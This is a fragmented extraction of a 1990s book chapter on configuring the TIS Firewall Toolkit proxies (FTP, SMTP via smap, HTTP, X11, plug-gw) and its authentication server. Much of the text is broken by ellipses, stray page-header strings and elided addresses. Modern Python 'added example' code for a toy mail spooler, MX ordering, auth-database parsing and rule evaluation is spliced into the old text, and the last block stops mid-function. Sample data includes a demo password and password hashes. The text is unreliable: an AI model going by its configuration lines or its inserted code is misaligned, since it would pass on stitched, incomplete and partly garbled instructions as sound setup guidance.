... com ... fonorola ... 191 ...

... 252] is not within the address space specified on the ftp-gw rule, the connection is denied, and the message shown here appears. ...


Connecting through the FTP Proxy
Establishing a connection through the proxy involves connecting to the ftp port and then specifying the host to connect to. ...

... 191 ... 150
Connected to 204...3...
220 pc...org FTP proxy (Version V1...
User (204...3...:(none)): ... fonorola ... fonorola ...
... 4(1) Fri Apr 21 22:42:18 EDT 1995) ready.
Password:
230-
230-Welcome to i*internet Inc...
230-
230 Guest login ok, access restrictions apply.
...

After you are connected, you must specify the username and the site to connect to. ... The remote server then prompts for the user's password, and if it is correct, allows the connection. ... For this reason, you may need to enable FTP access. ... With netacl, you can restrict what machines can connect to the firewall to specific machines within the local network. ...

... 191 ... * -exec /usr/libexec/ftpd -A -l

This entry for netacl allows systems on the 204...3 network to connect to the FTP server through netacl. ...

... 53 ... 62 2021
Connected to 198...166...
421 Service not available, remote server has closed connection
ftp>

From this message it appears that there is no server listening on port 2021, when in fact there is: netacl accepted the connection, found no rule permitting this client, and closed it without ever starting ftpd, so the client never sees a banner. ...

If you're not sure whether you will ever need access for FTP services to the firewall, the safest thing to do is to not allow this type of access except when absolutely necessary. ... Furthermore, the proxy must be configured to prevent connections to the firewall on the FTP port. ...

The smap agent is a client that implements a minimal version of SMTP. ... smap is designed to run under chroot as a non-privileged process; this setup overcomes potential security risks from privileged mailers that can be accessed from over a network. ... Mail is delivered by sendmail, and the spool file is deleted. ...


p1vPHCP/nhb1

Internet Security Pro Ref 577-7

tricia 1-24-95

CH07

LP#2

349

How to Build a Firewall

These two applications can share configuration information in the netperm-table file if desired
...


Installing the smap Client
The smap client runs whenever a connection request is received on the smtp port of the
firewall
...
conf file:
smtp    stream  tcp     nowait  root    /usr/local/etc/smap     smap

After /etc/inetd
...
This can be checked by connecting manually to the smtp port:
pc# telnet pc 25
Trying 206
...
65
...

Connected to pc
...
org
...

220 pc
...
org SMTP/smap Ready
...

help
214-Commands
214-HELO    MAIL    RCPT    DATA    RSET
214 NOOP    QUIT    HELP    VRFY    EXPN
quit
221 Closing connection
Connection closed by foreign host
...
In the spool directory, it may be required that an etc directory with
system specific configuration files be installed
...


Configuring the smap Client
The smap client reads its configuration from the netperm-table file by looking for the lines
beginning with smap
...
9
...
Table 7.9 smap Rules

Rule                 Description

userid name          Specify the userid under which smap should run
                     ... This userid should be the same as that under which smapd runs, and should have write permission to the spool directory
                     ...

directory pathname   A chroot system call is used to irrevocably make the specified directory the root file system for the remainder of the process
                     ...

maxbytes value       If no value is set, message sizes are limited by the amount of disk space in the spool area
                     ...
                     This option is only for administrators who are worried about the more esoteric denial of service attacks
                     ...

timeout value        If no timeout value is specified, smap will never time out a connection
                     ...
...
9, some items are common between the smap and smapd applications
...
For now, develop a configuration section for
the smap application
...
However, unlike the directory
clauses for the other applications, the smap client also uses the directory to save incoming
messages
...
If the message is larger than
the maxbytes value, the message size is truncated
...
The final clause specifies the maximum number of recipients that can be attached to the
mail message
...
The completed entry for the netperm-table
file looks like this:

smap:   userid 6
smap:   directory /var/spool/smap
smap:   timeout 3600
smap:   maxbytes 10000
smap:   maxrecip 20

If you set the value of maxbytes too small, users may not be able to receive some messages
because of the message’s size
...
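As an added example (illustrative code written for this section, not FWTK's smap), the following Python receiver shows what the minimal SMTP design described above amounts to: it understands only the verbs listed in the HELP output, spools each message to a file for a separate delivery agent instead of handing it to a privileged mailer, stops storing the body once maxbytes is reached, and refuses recipients beyond maxrecip. The configuration values mirror the sample netperm-table entry; the host name, the addresses and the temporary spool directory are placeholders.

```python
"""Toy store-and-forward SMTP receiver in the spirit of smap (added example,
not FWTK code): only the minimal command set is accepted, messages are
spooled to files rather than delivered, bodies are cut at maxbytes and
recipients beyond maxrecip are refused.  Runs offline on a list of lines."""
import os
import tempfile
from typing import Dict, Iterator, List, Optional, Tuple

# Constructed config mirroring the sample netperm-table entry for smap.
SMAP_CONFIG: Dict[str, Optional[int]] = {"maxbytes": 10000, "maxrecip": 20}
# The only verbs understood; anything else is answered with a 500.
ALLOWED = ("HELO", "MAIL", "RCPT", "DATA", "RSET", "NOOP", "QUIT", "HELP", "VRFY", "EXPN")


class SpoolSession:
    def __init__(self, spool_dir: str, config: Dict[str, Optional[int]] = SMAP_CONFIG):
        self.spool_dir = spool_dir
        self.maxbytes = config.get("maxbytes")   # None: limited only by disk space
        self.maxrecip = config.get("maxrecip")
        self.spooled: List[str] = []             # spool files written
        self.truncated = False                   # set once a body hits maxbytes
        self._reset()

    def _reset(self) -> None:
        self.sender: Optional[str] = None
        self.recipients: List[str] = []

    def run(self, client_lines: List[str]) -> List[str]:
        """Feed one client session through and return the server's replies."""
        replies = ["220 firewall.example.org SMTP/smap Ready"]   # placeholder host
        lines = iter(client_lines)
        for raw in lines:
            verb, _, arg = raw.strip().partition(" ")
            verb = verb.upper()
            if verb not in ALLOWED:
                replies.append("500 Command unrecognized")
            elif verb == "HELO":
                replies.append("250 Hello")
            elif verb == "MAIL":
                self.sender = arg.partition(":")[2].strip()
                replies.append("250 Sender OK")
            elif verb == "RCPT":
                if self.maxrecip is not None and len(self.recipients) >= self.maxrecip:
                    replies.append("452 Too many recipients")
                else:
                    self.recipients.append(arg.partition(":")[2].strip())
                    replies.append("250 Recipient OK")
            elif verb == "DATA":
                if self.sender is None or not self.recipients:
                    replies.append("503 Need MAIL and RCPT first")
                    continue
                replies.append('354 Enter mail, end with "." on a line by itself')
                self._spool(self._collect_body(lines))
                replies.append("250 Mail accepted for delivery (spooled)")
                self._reset()
            elif verb == "RSET":
                self._reset()
                replies.append("250 Reset state")
            elif verb == "NOOP":
                replies.append("250 OK")
            elif verb == "HELP":
                replies.append("214 " + " ".join(ALLOWED))
            elif verb in ("VRFY", "EXPN"):
                replies.append("252 Cannot VRFY user; try RCPT")   # leak no names
            else:                                                  # QUIT
                replies.append("221 Closing connection")
                break
        return replies

    def _collect_body(self, lines: Iterator[str]) -> bytes:
        """Read up to the lone "." terminator, keeping at most maxbytes."""
        chunks: List[bytes] = []
        size = 0
        for raw in lines:
            text = raw.rstrip("\r\n")
            if text == ".":
                break
            data = (text + "\n").encode()
            if self.maxbytes is not None and size + len(data) > self.maxbytes:
                chunks.append(data[: self.maxbytes - size])   # fill the remaining quota
                size = self.maxbytes
                self.truncated = True
                continue   # keep draining to the terminator, store nothing more
            chunks.append(data)
            size += len(data)
        return b"".join(chunks)

    def _spool(self, body: bytes) -> str:
        """Write envelope and body to a new spool file for the delivery agent."""
        path = os.path.join(self.spool_dir, "msg%d.txt" % len(self.spooled))
        with open(path, "wb") as fh:
            fh.write(("FROM: %s\n" % self.sender).encode())
            for rcpt in self.recipients:
                fh.write(("RCPT: %s\n" % rcpt).encode())
            fh.write(b"\n" + body)
        self.spooled.append(path)
        return path


def demo(config: Dict[str, Optional[int]] = SMAP_CONFIG) -> Tuple[SpoolSession, List[str]]:
    """Constructed session: an unknown verb, three recipients and a 50-byte body."""
    session = SpoolSession(tempfile.mkdtemp(prefix="smap-demo-"), config)
    replies = session.run([
        "EHLO client.example.org",          # not in the minimal set
        "HELO client.example.org",
        "MAIL FROM:<alice@example.org>",
        "RCPT TO:<bob@example.net>",
        "RCPT TO:<carol@example.net>",
        "RCPT TO:<dave@example.net>",
        "DATA", "Subject: hi", "", "0123456789" * 5, ".",
        "QUIT",
    ])
    return session, replies
```

demo() runs one constructed session. With the sample values nothing is cut; with maxbytes set to 40 and maxrecip to 2 the third RCPT is refused with a 452 and the spooled body stops at 40 bytes, which is exactly the situation the maxbytes warning above describes.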
Lines that
resemble the following indicate the incoming mail message is too large to process:
Oct 29 12:09:52 pc smap[868]: connect host=unknown/198
...
64
...
This is the only way the firewall operator can check
to see if large messages are the reason why mail isn’t being sent
...
It is not very difficult to
complete its setup
...
local script and runs the entire time the system is running
...
local and then the system is rebooted
...
local file:
echo “Starting Firewall Mail Processor
...
To do this,
add a line similar to the following to the crontab file:
0,30 * * * * /usr/sbin/sendmail -q > /dev/null 2>&1

This ensures that any messages that cannot be successfully delivered by the smapd application
will be properly handled
...
They
generally run without a problem
...
The smap application reads the mail queue
on a periodic basis and delivers mail to the remote system
...
10
...
Table 7.10 smapd Rules

Rule                    Description

executable pathname     Specifies the pathname of the smapd executable
                        ... THIS ENTRY IS MANDATORY
                        ...

sendmail pathname       smapd assumes the use of sendmail but does not require it
                        ... recipN]
                        ...

baddir pathname         Specifies a directory where smapd should move any spooled mail that cannot be delivered normally
                        ... The pathname specified should not contain a trailing “/”
                        ...

userid name             The name can be either a name from the password database, or a numeric userid
                        ...

directory pathname      Specifies the spool directory in which smapd should search for files
                        ...

wakeup value            Specifies the number of seconds smapd should sleep between scans of the spool directory
                        ...


Some options are common for smap and smapd
...
The executable rule identifies
the location of the smapd program
...
The sendmail option specifies
where the sendmail program is found
...

The userid and directory rules specify the user under which the smapd binary executes, and the
home directory used for that configuration
...
The value assigned to directory provides the name of the directory where the in transit mail messages are
stored; a bad directory will be created there to save any undelivered or questionable messages
...

The default is 60 seconds; this example uses a 15 minute window
...
This is done by
adding MX, or mail exchanger, records to the DNS providers for the network domain, or
zone
...

Server: nic
...
net
Address: 198
...
64
...
org
nameserver = nic
...
net
unilabs
...
fonorola
...
org
preference = 10, mail exchanger = mail
...
net
unilabs
...
unilabs
...
org
preference = 5, mail exchanger = nis
...
net
unilabs
...
fonorola
...
fonorola
...
org
nameserver = nic
...
net
unilabs
...
fonorola
...
fonorola
...
53
...
7
fonsrv00
...
com
internet address = 149
...
1
...
fonorola
...
53
...
8
pc2
...
org
internet address = 198
...
166
...
fonorola
...
53
...
14
>

This output is from the nslookup command
...
org
unilabs
...
org

preference = 1, mail exchanger = pc2
...
org
preference = 5, mail exchanger = nis
...
net
preference = 10, mail exchanger = mail
...
net

When mail for the domain unilabs
...
org domain itself
...
In the sample setup
you’ve watched develop throughout this chapter, the host pc2
...
org, which is the
firewall, will be contacted first to see if it can in fact accept the email
...

If the machine with the lowest preference value is not available, then the next system is
contacted—in this case, nis
...
net
...
fonorola
...
unilabs
...
The same is true should the second mail system not
be available and the mail server must then contact the third system
...
For example, the system nis
...
net could
simply decide to attempt delivery itself and not use the next MX record
...
cf file on the remote machine
...
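To make the preference walk concrete, here is an added example (written for this section, not taken from the book or the Toolkit). The records mirror the nslookup output above, with the firewall at preference 1, nis at 5 and mail at 10; the domain parts are placeholders for the elided names. mx_order gives the order a sending MTA uses, deliver walks it against a supplied reachability map, and relay_candidates shows the RFC 974 rule that an exchanger relaying onward considers only exchangers of strictly lower preference, which is why a host such as nis may end up delivering itself rather than consulting the next record.

```python
"""MX preference walk, as an added example (not FWTK code).  Records are a
constructed set in the shape of the nslookup output; host names are placeholders."""
import random
from typing import Dict, List, Optional, Sequence, Tuple

MXRecord = Tuple[int, str]   # (preference, mail exchanger)

# Lower preference is tried first; the firewall carries the lowest value.
MX_RECORDS: List[MXRecord] = [
    (10, "mail.example.net"),
    (5, "nis.example.net"),
    (1, "pc2.example.org"),    # the firewall, contacted first
]


def mx_order(records: Sequence[MXRecord], rng: Optional[random.Random] = None) -> List[str]:
    """Hosts by ascending preference; equal preferences are shuffled (RFC 974)."""
    rng = rng or random.Random()
    by_pref: Dict[int, List[str]] = {}
    for pref, host in records:
        by_pref.setdefault(pref, []).append(host)
    order: List[str] = []
    for pref in sorted(by_pref):
        hosts = list(by_pref[pref])
        rng.shuffle(hosts)
        order.extend(hosts)
    return order


def deliver(records: Sequence[MXRecord],
            reachable: Dict[str, bool]) -> Tuple[Optional[str], List[str]]:
    """Try each exchanger in order until one accepts; return (acceptor, hosts tried).
    A host missing from the map counts as unreachable."""
    tried: List[str] = []
    for host in mx_order(records):
        tried.append(host)
        if reachable.get(host, False):
            return host, tried
    return None, tried    # every exchanger down: the MTA queues and retries later


def relay_candidates(records: Sequence[MXRecord], self_host: str) -> List[str]:
    """Exchangers a relaying MX may forward to: only those with a preference
    strictly lower than its own.  Never itself or its peers, which is what
    keeps mail from looping between exchangers of the same domain."""
    own = [pref for pref, host in records if host == self_host]
    if not own:
        raise ValueError(f"{self_host} is not an MX for this domain")
    return mx_order([(p, h) for p, h in records if p < min(own)])
```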


Configuring the HTTP Proxy
The HTTP proxy, http-gw, does more than simply provide a mechanism for HTTP requests
to be sent through the firewall
...

The HTTP proxy also supports “proxy aware” clients, and supports clients that are not
designed to work with these daemons
...

By default, an HTTP or Gopher server usually runs on TCP/IP ports 80 and 70, respectively
...
This is done by adding the following lines
to the /etc/services file:
gopher    70/tcp
httpd     80/tcp

With these lines added, inetd now knows on what ports to listen
...
conf:
httpd   stream  tcp     nowait  root    /usr/local/etc/http-gw  http-gw
gopher  stream  tcp     nowait  root    /usr/local/etc/http-gw  http-gw

With the inetd configuration file now updated, inetd must be restarted, or instructed to read
its configuration file using the kill -1 command
...

http-gw reads its configuration rules and permissions information from the firewall configuration table netperm-table, retrieving all rules specified for “http-gw”
...
Table 7
...


Table 7
...
If this value is specified, http-gw will set its
userid before providing service
...


directory pathname

Specifies a directory to which http-gw will chroot prior to providing
service
...

Defaults to 60 minutes
...


default-httpd server

Defines an HTTP server to which requests can be handed off if they
came from a WWW client using the HTTP protocol
...
If not
specified, the proxy will do the FTP transaction with the FTP server
...


The userid, directory, and timeout values serve the same functions as the other proxy agents in
the Toolkit
...
To understand their impact, you need to examine
how a non-proxy aware and a proxy aware WWW client operate
...
0 from Microsoft,
cannot communicate with a proxy
...
To do this, the user must specify the URL in the
format:
http://firewall_system/http://destination

as in
http://pc
...
org/http://www
...
org

The client will pass the request for http://www
...
org to the firewall
...

Although a proxy-aware client can still use this format, this is the only format that can be used
with non-proxy HTTP clients
...
Table 7
...


Table 7
...
In these
situations, their WWW client hotlists will have to be edited to include the firewall in the URL
...
However, some application-specific configuration is required to make it work
...

Aside from this application-specific customization, there are no other difficulties in using the
proxy aware client
...

All World Wide Web clients can access Gopher (and FTP) sites
...

Accessing a gopher server with a World Wide Web browser is much easier than with many
Gopher clients, if the World Wide Web browser is proxy-aware
...


Host Access Rules
Up to this point in the chapter, you have seen how the user interacts with the proxy
...

Some of these rules have been examined already, and are important enough to mention again
...
Some of
these parameters include restricting the allowable functions
...
13
...
Table 7.13 Host Access Rules

Option                                              Description

hosts host-pattern [host-pattern ...] [options]
deny-hosts host-pattern [host-pattern ...]

Typically, a host rule will be in the form of:
http-gw: deny-hosts unknown
http-gw: hosts 192.112.94.*

-permit function
-permit { function [function ...] }                 ... Other functions will be denied
                                                    ...

-deny function
-deny { function [function ...] }                   ...

-gopher server                                      Make server the default server for this transaction
                                                    ...
                                                    This will be used if the request came in through the HTTP protocol
                                                    ...

-filter { function [function ...] }                 Removes the specified functions when rewriting selectors and URLs
                                                    ...


Several host patterns may follow the “hosts” keyword; the first optional parameter after these
patterns begins with “-”
...

Some basic configuration rules are shown here to help you understand how the options for
host rules are used:
http-gw:    userid www
# http-gw:  directory /usr/local/secure/www
http-gw:    timeout 1800
http-gw:    default-httpd www ... net
http-gw:    default-gopher gopher ... net
http-gw:    permit-hosts 206 ... 65 ...
To deny access to specific hosts or networks, use a line similar to:
http-gw:    deny-hosts 206 ... 65 ...

The permit-host rules can include function definitions that are permitted or denied depending
on the established criteria in the rule
...
For the deny options the request is used; for filter options the returned
selectors are used
...
14
...
Table 7.14 Function Definitions

Function    Description

dir         Fetching Gopher menus
            ...

read        Fetching an HTML document
            ... HTML files are treated as read even though they are also dir
            ...
            Needs Gopher+ since only available to Gopher+ and HTTP/1
            ...

ftp         Accessing an FTP server
            ...
            HTTP methods other than GET
            ...

exec        Operations that require a program to be run; that is, telnet
            ...

If no deny or permit functions are specified, every
function is permitted
...
fonorola
...
fonorola
...
116
...
* -deny ftp
deny-hosts 206
...
65
...
A sample error message would look like:
[figure: sample http-gw error message, not reproduced in this extract]
Closing one door but leaving a related one
open is not wise
...
To use a Gopher client, you must configure the default gopher server that is used to
establish the connection to the firewall
...

Because of the looming difficulty associated with Gopher clients, the use of Gopher via the
World Wide Web interface is popular and widely accepted
...


Configuring the X Windows Proxy
The x-gw X Windows proxy is provided to allow a user-level X Windows interface that
operates under the tn-gw and rlogin-gw access control
...

The proxy operates by allowing clients to be started on arbitrary hosts outside the firewall, and
then requesting a connection to the specified display
...
Upon receiving the connection request, x-gw displays the window on the user’s real
display
...
If the
user agrees to accept the connection, x-gw passes the data from the virtual display to the user’s
real display
...
116
...
3
...
unilabs
...

Escape character is ‘^]’
...
unilabs
...
3) ready:
tn-gw-> x
tn-gw-> exit
Disconnecting
...


At this point a window pops up on the user’s display that shows the port number of the proxy
to use; the window also serves as the control window
...

Although the x-gw proxy is advanced and user-friendly, some issues concerning this proxy need
to be mentioned
...
If
your system does not have the X11 libraries or the Athena Widget set, this proxy will not
compile, and you will be forced to live without it
...


Understanding the Authentication Server
The TIS Firewall Toolkit includes extensive authentication mechanisms
...

The authentication server, known as authsrv, is designed to support multiple authentication
processes independently
...
The information stored for each user consists of:
- The user’s name
- The user’s group
- The user’s long name
- The last successful authentication

Passwords may be plaintext for local users, or encrypted for all others
...


Warning: Plaintext passwords should never be used for authentication by users on nonsecure networks
...
authsrv also contains support for
multiple forms of authentication, including:
- Internal plaintext passwords
- Bellcore’s S/Key
- Security Dynamics SecurID
- Enigma Logics Silver Card
- Digital Pathways SNK004 Secure Net Key

Note: The Bellcore S/Key mechanism that is included with the Toolkit does not include the
complete software
...
bellcore
...


When compiling authsrv, the administrator needs to decide which authentication forms will be
supported locally
...
For each proxy in the Toolkit, authentication can be enabled or disabled,
or fit certain criteria, such as incoming must authenticate, and outgoing requires no authentication
...
To
configure the authentication server, you must find an unused TCP/IP port number and add it
to /etc/services
...

authsrv     7777/tcp    # TIS Toolkit Authentication

Authsrv is not a daemon
...
Consequently, it is necessary to add an entry to the /etc/inetd
...
conf files, inetd must
be reloaded or restarted using the kill command
...
Keep in mind that not all operations need to require authentication
...
To see this in action, consider
adding authentication to the FTP proxy
...
authenticated
...
For example,
consider the permit-hosts entry in the following:
ftp-gw: permit-hosts

206
...
65
...
This process will be
demonstrated later in this chapter after you learn how to configure the users in the authentication database
...

This prevents unwanted attempts to probe the authentication server from hosts running
software that needs no authentication
...
Table 7.15 Authentication Server Rules

Rule                 Description

database pathname    Specifies the pathname of the authsrv database
                     ... If the software is built with a compiled-in database name, this option need not be set; otherwise, it is mandatory
                     ...

nobogus true         The default message is to simply respond, “Permission Denied
                     ... If nobogus is set, attempts to log on will return more explicit error messages
                     ...

badsleep seconds     Establishes a “sleep time” for repeated bad logins
                     ... If the badsleep value is set, the user may attempt to log in again after the set number of seconds has expired
                     ... The default value is to effectively disable the account until an administrator re-enables it manually
                     ...

userid name          The name can be either a name from the password database, or a numeric user-ID
                     ...

                     Hosts that do not have a matching entry are denied use of the service
                     ...

operation user id telnet-gw host
operation user id ftp-gw host put
                     Operation rules are stored in netperm-table
                     ... The user/group field indicates whether the record is for a user or a group
                     ... The service can be a service specified by the proxy (usually ftp-gw, tn-gw, or rlogin-gw)
                     ... The optional tokens are checked for a match, permitting a proxy to send a specific operation check to the authentication server
                     ...


If no other systems on the private network require access to the authsrv, then clients and the
server should be configured to accept connections only using the localhost name or IP address
127
...
0
...
The authentication server configuration rules shown earlier illustrate a sample
configuration for the server
...
0
...
1
authsrv:    database /usr/local/etc/fw-authdb
authsrv:    badsleep 1200
authsrv:    nobogus true

- Identifies that the localhost is allowed to access the server
- Specifies that the authentication database is found in /usr/local/etc/fw-authdb
- The user cannot attempt to authenticate after five bad logins until 1,200 seconds have
  expired
- Prints more verbose messages about authentication failures

The operation rule is essential to administrators who want to restrict the commands that can
be executed by certain users at certain times
...
These
rules apply to the authsrv command and not to the individual proxies themselves
...
cdnnet
...
comewhere
...
With the
authentication server configured and ready, users must now be added so that they can be
authenticated whenever necessary
...
This
can be done by using the authsrv command
...

The authentication server has a number of commands, listed in table 7
...


Table 7
...
Before the
authentication server permits the use of this command, the
administrator must first be authenticated to the server as an
administrator or a group administrator
...
When a user is added,
the user is initially disabled
...
Long names should be quoted if
they contain whitespace
...

Before an administrator can use this command, he or she
must first be authenticated to the server as the administrator
or group administrator of the group to which the user
belongs
...
Before the authentication server permits
the use of this command, the administrator must first be
authenticated to the server as the administrator or as the
group administrator of the group to which the user belongs
...

Before this command can be used, the administrator must
first be authenticated to the server as the administrator or
group administrator of the group to which the user
belongs
...
To use this command, the
administrator must first be authenticated to the server as the
administrator
...


list [group]

Lists all users that are known to the system, or the members
of the specified group
...
The list displays
several fields, including:
- user
  ...
- group
  ... If none is listed, the user is in no group
  ...
- The user’s full name
  ...
- status
  ...

password [username] text    Sets the password for the current user
                            ... The password command is polymorphic depending on the user’s specified authentication protocol
                            ... If the authentication protocol is SecurID with PINs, it will update the PIN
                            ...
Table 7.16, Continued
Administrator Commands for Authentication Setup

Command                 Description

proto user protoname    Sets the authentication protocol for the specified user to the named protocol
                        ... To change a user’s authentication protocol, the administrator must be authenticated to the server either as the administrator or group administrator of the user’s group
                        ...

superwiz user           Sets the specified user as a global administrator
                        ...

wiz user                Sets or turns off the group administrator flag on the specified user
or unwiz user           ...

? or help               Lists a short synopsis of available commands
                        ...
To do this, make sure you are logged in as root on the firewall, and run the
authsrv command:
pc# pwd
/usr/local/etc
pc#
...
16
...
No password is associated with the
user
...

authsrv# password chrish whisper
Password for chrish changed
...
Available protocols depend on the protocols that were
compiled when authsrv was built
...
In this instance, the only options available are none and password
...
At this point, the user chris
can authenticate him- or herself using the authentication server
...
Normally this
wouldn’t be done because global administrative privileges supersede the privileges of the group
administrator
...

authsrv# list
Report for users in database
user     group       longname     status  proto  last
------   ------      --------     ------  -----  ----
chrish   production  Chris Hare   y G     passw  never
authsrv#

This output shows the username, the group that the user belongs to, the long name, the status
flags, authentication protocol, and when the user last authenticated
...

authsrv# display chrish
Report for user chrish, group production (Chris Hare)
Authentication protocol: password
Flags: WIZARD GROUP-WIZARD
authsrv#

As you can see, this command provides information similar to the list command, but includes
a text explanation of the flags set for this user
...


The Authentication Shell—authmgr
The authsrv command enables a local user access to the firewall host to manipulate the
database; the authmgr program allows the same manipulation, but from a trusted host on the
network or through the local host
...
If the user is not enabled or in the database, the connection is refused
...

pc#
...
This may be apparent, but keep in mind that the authmgr command actually
established a TCP session to the authsrv program
...
The authload command manipulates individual records in the database; it does not
truncate an existing database
...
If you have users who share
similar information between sites, the existing records will be overwritten with newer information when this information is loaded by the authload command
...

This ASCII copy contains all the information regarding the user account
...

The authdump command reads the contents of the authentication database and writes the
ASCII text
...
/authdump
user=chrish
longname=Chris Hare
group=production
pass=cY8IDuONJDQRA
flags=2
bad_count=0
proto=p
last=0
user=admin
longname=Auth DBA
group=manager
pass=tx6mxx/lUy2Mw
flags=2

If the command is executed and the output is redirected to a file, the program prints a dot for
each record dumped, along with a report of the total records processed:
pc#
...

3 records dumped
pc#

If you have this information stored somewhere else in a human-readable form (except for the
passwords), you can re-create the user database if the firewall ever needs to be rebuilt
...

The authload command is valuable if the user database was destroyed, or you have a large
number of users to add at once
...
Consider the new
entry added to this ASCII dump file:
user=terrih
longname=Terri Hare
group=production
pass=
flags=0
bad_count=0
proto=p
last=

Now you can load the records into the database, using input redirection because the information is in the ASCII dump file:
pc#
...

4 records loaded
pc#

This results in a report showing the number of records that have been loaded
...
/authmgr
Connected to server
authmgr-> login
Username: admin
Password:
Logged in
authmgr-> list
Report for users in database
user     group       longname     status  proto  last
------   ------      --------     ------  -----  ----
paulp    copy                     n G     passw  never
terrih   production  Terri Hare   y       passw  never
chrish   production  Chris Hare   y W     passw  never
admin    manager     Auth DBA     y W     passw  Sat Oct 28 01:45:32 1995
authmgr->

At this point, it is important to note that the new account terrih is enabled, but there is no
password
...
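The dump format is simple enough to process with a short script, which is how an operator would catch the situation just described before it matters. The following is an added example written for this section, not the Toolkit's authdump or authload: a record begins at each user= line and carries the keys shown in the dump; merge_records mirrors what the text says authload does with an existing database (new users are added, matching users are overwritten, nothing is truncated), and passwordless reports records whose pass field is empty. The dump text is constructed in the page's format, with placeholder strings in place of the hashes.

```python
"""Reader, writer and audit for the authdump key=value record format
(added example, not FWTK code).  Dump text below is constructed; the
hash values are placeholders."""
from typing import Dict, List

FIELDS = ("user", "longname", "group", "pass", "flags", "bad_count", "proto", "last")

DUMP = """\
user=chrish
longname=Chris Hare
group=production
pass=PLACEHOLDER_HASH_1
flags=2
bad_count=0
proto=p
last=0
user=admin
longname=Auth DBA
group=manager
pass=PLACEHOLDER_HASH_2
flags=2
bad_count=0
proto=p
last=0
"""

# The hand-written addition from the text: a new user with no password yet.
NEW_USER = """\
user=terrih
longname=Terri Hare
group=production
pass=
flags=0
bad_count=0
proto=p
last=
"""

Record = Dict[str, str]


def parse_authdump(text: str) -> List[Record]:
    """One record per user= line; unknown keys or keys before user= are errors."""
    records: List[Record] = []
    current: Record = {}
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line:
            continue
        key, sep, value = line.partition("=")
        if not sep or key not in FIELDS:
            raise ValueError(f"line {lineno}: unexpected field {line!r}")
        if key == "user":
            if current:
                records.append(current)
            current = {}
        elif not current:
            raise ValueError(f"line {lineno}: {key}= before any user= line")
        current[key] = value
    if current:
        records.append(current)
    return records


def dump_records(records: List[Record]) -> str:
    """Serialize back to the same format, one key=value per line, fields in order."""
    out = []
    for rec in records:
        for key in FIELDS:
            out.append(f"{key}={rec.get(key, '')}")
    return "\n".join(out) + "\n"


def merge_records(existing: List[Record], loaded: List[Record]) -> List[Record]:
    """Like authload: add new users, overwrite existing ones, never truncate."""
    by_user = {rec["user"]: rec for rec in existing}
    for rec in loaded:
        by_user[rec["user"]] = rec
    return list(by_user.values())


def passwordless(records: List[Record]) -> List[str]:
    """Users whose pass field is empty: they need a password before they can be used."""
    return [rec["user"] for rec in records if not rec.get("pass")]
```

Running passwordless over the database right after an authload is a cheap check to add to the nightly authdump cron job described below.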

As an added measure of safety, it is advised to add a line to root’s crontab to make “backups”
of the authentication database
...
backup

The cron command will run the authdump command at 1:00 AM, every morning
...
If the information on your server
does not change very often, you probably should adjust the timing of the cron execution of
authdump
...
Each of the
proxies has the option of being configured to operate with the authentication server
...
The FTP proxy’s configuration can be found
in the section “Configuring the FTP Gateway
...
txt
/usr/local/etc/ftp-welcome
...
txt
localhost
7777
3600
206
...
65
...
In fact, it is fairly specific in that any request to retrieve a file
from the remote, or to store a file on the remote results in that operation being logged by the
proxy
...
This process is illustrated here:
pc# ftp pc
Connected to pc
...
org
...
com
220
Name (pc
...
org:chrish): chrish@nds
...
net
331-(----GATEWAY CONNECTED TO nds
...
net----)
331-(220 nds
...
net FTP server (Version A) ready
...

Password:
230 User chrish logged in
...

Using binary mode to transfer files
...

500 command requires user authentication
ftp> quote authorize chrish
331 Enter authentication password for chrish
ftp> quote response whisper
230 User authenticated to proxy
ftp> put /tmp/trace
local: /tmp/trace remote: /tmp/trace
200 PORT command successful
...

226 Transfer complete
...
0061 seconds (3
...


For FTP clients that do not know which proxy is used for authentication, the ftp quote
command must be used to “speak” with the authentication server on the firewall
...


This is just one example of authentication use with proxies; countless more examples could be
used
...


Using plug-gw for Other Services
The applications you have read about so far cover about 80 percent of the network traffic
...
This application provides plugboard type connections; that is, it
connects a TCP/IP port on the firewall to another host using the same or a different TCP port
number
...
The
next few sections examine the operation and configuration of plug-gw by looking specifically at
their services
...
The clauses listed in table 7
...


Table 7
...
If no timeout is specified, the
default is to remain connected until one side or the other
closes its connection
...
When a connection is made,
a match is searched for on the port-id and calling host
...
If the
calling port matches, then the host-pattern is checked for
a match following the standard address matching rules
employed by the firewall
...


Rule                Description

-plug-to host       Specifies the name or address of the host to connect to
                    ...

-privport           Indicates that a reserved port number should be used when connecting
                    ...

-port portid        Specifies a different port
                    ...


The purpose of plug-gw is to allow for other services to be passed through the firewall with
additional logging to track the use of these services
...
Some
applications do not have extended authentication mechanisms in them; plug-gw makes their
use with firewalls much less of a bother
...
116
...
* -plug-to 198
...
64
...
116
...
53
...
14
...
Few services actually require these
...

As with the other services, the host pattern that is specified with the port command allows for
both the allowed and non-allowed network or host IP addresses to be specified
...
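The host-rule evaluation that the http-gw section above and the plug-gw port rules here share is small enough to show in full. The following Python is an added example written for this section, not Toolkit code: it parses the “application: rule arguments” line format used throughout the chapter, matches the calling host against a host pattern, and makes the two decisions the text describes, namely whether http-gw lets a client use a function under the -permit/-deny options of a host rule, and which host and port a plug-gw port rule plugs a connection to. Simplifications of this example: patterns are dotted IPv4 addresses with a trailing “*” wildcard or the word unknown (a client whose address does not resolve), whereas the real matcher also handles host names; the first matching rule wins. All addresses are constructed placeholders.

```python
"""Evaluation of netperm-table host and port rules (added example, not FWTK
code).  Table fragment and addresses are constructed placeholders."""
from typing import Dict, List, Optional, Tuple

# Deny rules are listed before the permit rule because evaluation is first-match.
NETPERM_TABLE = """
# http-gw: unknown clients and one workstation refused, the rest of the net
# may use everything except ftp and exec
http-gw:   deny-hosts unknown
http-gw:   deny-hosts 192.0.2.99
http-gw:   permit-hosts 192.0.2.* -deny { ftp exec }
# plug-gw: news on 119, a second news server reached via 2120, POP on 110
plug-gw:   port 119  192.0.2.* -plug-to 198.51.100.5
plug-gw:   port 2120 192.0.2.* -plug-to 198.51.100.6 -port 119
plug-gw:   port 110  192.0.2.* -plug-to 198.51.100.7
"""

Rule = Tuple[str, List[str]]          # (keyword, arguments)


def parse_netperm(text: str) -> Dict[str, List[Rule]]:
    """Group rules by application, dropping comments and blank lines."""
    rules: Dict[str, List[Rule]] = {}
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        app, sep, rest = line.partition(":")
        fields = rest.split()
        if not sep or not fields:
            raise ValueError(f"line {lineno}: expected 'application: rule ...'")
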